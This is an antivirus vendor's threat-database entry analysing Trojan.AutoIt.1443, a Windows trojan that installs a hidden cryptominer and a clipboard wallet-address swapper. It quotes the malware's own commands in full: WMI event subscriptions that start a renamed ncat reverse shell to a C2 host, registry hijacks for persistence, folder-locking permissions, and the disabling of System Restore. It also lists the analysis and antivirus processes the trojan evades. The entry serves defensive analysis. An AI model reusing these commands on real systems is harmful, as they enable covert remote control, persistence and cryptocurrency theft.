Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Trojan.AutoIt.1443

Added to the Dr.Web virus database: 2024-08-27

Virus description added:

  • 09cffca796dce03c74950e10a349079d9afe3964
  • 419ef7dc18d178247daf68f0571a3dccb662792f
  • 9c17f83aba6b60c8d461a923050fc9a19e386ec1
  • e7ac807a446640a95a961fb5d873c051ee8c2793

Description

Malicious Autoit script for OS Windows that drops a number of files to a compromised PC to implement hidden cryptocurrency mining and spoof data in the clipboard.

Operating routine

The script is launched by a dropper, which is a self-extracting archive. Once launched, Trojan.AutoIt.1443 will perform the following actions:

1. Check the process list for the following lines from the list below:


dUcAvastUI.exe
avgui.exe
avp.exe
avpui.exe
UninstallTool.exe
UninstallToolHelper.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
httpdebuggerui.exe
wireshark.exe
fiddler.exe
vboxservice.exe
df5serv.exe
vboxtray.exe
vmtoolsd.exe
vmwaretray.exe
ida64.exe
ollydbg.exe
pIIfaXUcjllboZRestudio.exe
vmwareuser.exe
vgauthservice.exe
vmacthlp.exe
vmsrvc.exe
x32dbg.exe
x64dbg.exe
x96dbg.exe
vmusrvc.exe
prl_cc.exe
prl_tools.exe
qemu-ga.exe
joeboxcontrol.exe
ksdumperclient.exe
xenservice.exe
joeboxserver.exe
devenv.exe
immunitydebugger.exe
importrec.exe
windbg.exe
32dbg.exe
64dbg.exex
protection_id.exex
scylla_x86.exe
scylla_x64.exe
scylla.exe
idau64.exe
idau.exe
idaq64.exe
idaq.exe
idaw.exe
idag64.exe
idag.exe
ida.exe

If any of these processes are found, the script will terminate.

2. Create directories

C:\ProgramData\NUL..
C:\ProgramData\AUX..
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Set the SYSTEM, HIDDEN and READONLY attributes for the following directories: C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} and C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}.

3. Unpack files

C:\ProgramData\NUL..\libssl-1_1.dll
C:\ProgramData\NUL..\vcruntime140.dll
C:\ProgramData\NUL..\libcrypto-1_1.dll
C:\ProgramData\NUL..\StartMenuExperienceHost.exe

These files are not malicious. They are required to implement network communication through the StartMenuExperienceHost.exe executable, which is a renamed ncat.exe. This file connects to the attacker's C2 server. It is detected as Tool.Ncat.1.

C:\ProgramData\AUX..\ShellExt.dll
C:\ProgramData\AUX..\DeviceId.dll

The ShellExt.dll file, which is unpacked to all directories created above, is a renamed AutoIt language interpreter. Here it runs a malicious script embedded in the overlay of the DeviceId.dll file, which has a valid digital signature. The script unpacks and launches the SilentCryptoMiner miner (detected as Trojan.BtcMine.3767), which is injected in the explorer.exe process using the Process Hollowing technique.

C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellExt.dll
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DeviceId.dll

Similarly, in this directory, the AutoIt interpreter (ShellExt.dll) initiated by nun.bat runs a malicious script embedded in the DeviceId.dll file overlay to mine cryptocurrency.

C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun.bat
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellExt.dll
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\7zxa.dll

This set of files is designed to run a clipper hidden in the 7zxa.dll library, which is also injected in explorer.exe using the Process Hollowing technique. The clipper spoofs cryptocurrency wallet addresses in the clipboard.

C:\ProgramData\inst.bat

This script performs the same functions as described below in item 4.1.

4. Create events and modify the registry

4.1 Add events that ensure connection to the C2 server using StartMenuExperienceHost.exe (ncat.exe)


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nut", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nut", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers[.]com 5353 -e cmd.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nut"", Consumer="CommandLineEventConsumer.Name="nut""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nur", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nur", ExecutablePath="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nur"", Consumer="CommandLineEventConsumer.Name="nur""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="per", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="per", ExecutablePath="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="per"", Consumer="CommandLineEventConsumer.Name="per""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pers", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="pers", CommandLineTemplate="C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId[.]dll"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pers"", Consumer="CommandLineEventConsumer.Name="pers""

4.2 Add registry keys to run malicious files using the IFEO technique


reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MoUsoCoreWorker.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustedInstaller.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f

5. Configuration

5.1 Change directory permissions by running the following commands

icacls "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C
icacls "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C

This revokes the following permissions:

  • Delete
  • Change discretionary access control list
  • Write permissions for the owner
  • Change access control security settings
  • Create new subfolders and append data
  • Write attributes, including extended attributes
  • Delete subfolders and files
  • Create files and write data

5.2 Disable System Restore by modifying the registry subkeys:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableSR=1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableConfig=1

Then, the following command is executed:

reagentc /disable

5.3 Run the C:\ProgramData\inst.bat file

6. Obtain information about the compromised computer

Send a GET request to ip-api[.]com/json to obtain geolocation information. Information about the GPU model and installed antivirus software is collected using the winmgmt.exe utility, the CPU model is retrieved from the HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 registry subkey, and information about the operating system is read from the @OSVersion and @OSArch variables in Autoit.

The received information is sent to the Telegram bot.

Mitre Matrix

Stage Technique
Execution (TA0002) Windows Management Instrumentation (T1047)
Command and Scripting Interpreter (T1059)
Scripting (T0853)
Shared Modules (T1129)
Persistence (TA0003) Event Triggered Execution (T1546)
Image File Execution Options Injection (T1546.011)
Boot or Logon Autostart Execution (T1547)
Registry Run Keys / Startup Folder (T1547.001)
Hijack Execution Flow (T1574)
DLL Side-Loading (T1574.002)
Services File Permissions Weakness (T1574.010)
Privilege Escalation (TA0004) Process Injection (T1055)
Process Hollowing (T1055.012)
Event Triggered Execution (T1546)
Image File Execution Options Injection (T1546.012)
Registry Run Keys / Startup Folder (T1547.001)
Defense Evasion (TA0005) Obfuscated Files or Information (T1027)
Masquerading (T1036)
Process Injection (T1055)
Process Hollowing (T1055.012)
Indicator Removal (T1070)
File Deletion (T1070.004)
Modify Registry (T1112)
File and Directory Permissions Modification (T1222)
Hide Artifacts (T1564)
Hidden Files and Directories (T1564.001)
Virtualization/Sandbox Evasion (T1497)
Discovery (TA0007) System Information Discovery (T1082)
Software Discovery (T1518)
System Location Discovery (T1614)
Collection (TA0009) Clipboard Data (T1115)
Screen Capture (T1113)
Command and Control (TA0011) Encrypted Channel (T1573)
Impact (TA0040) System Shutdown/Reboot (T1529)

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android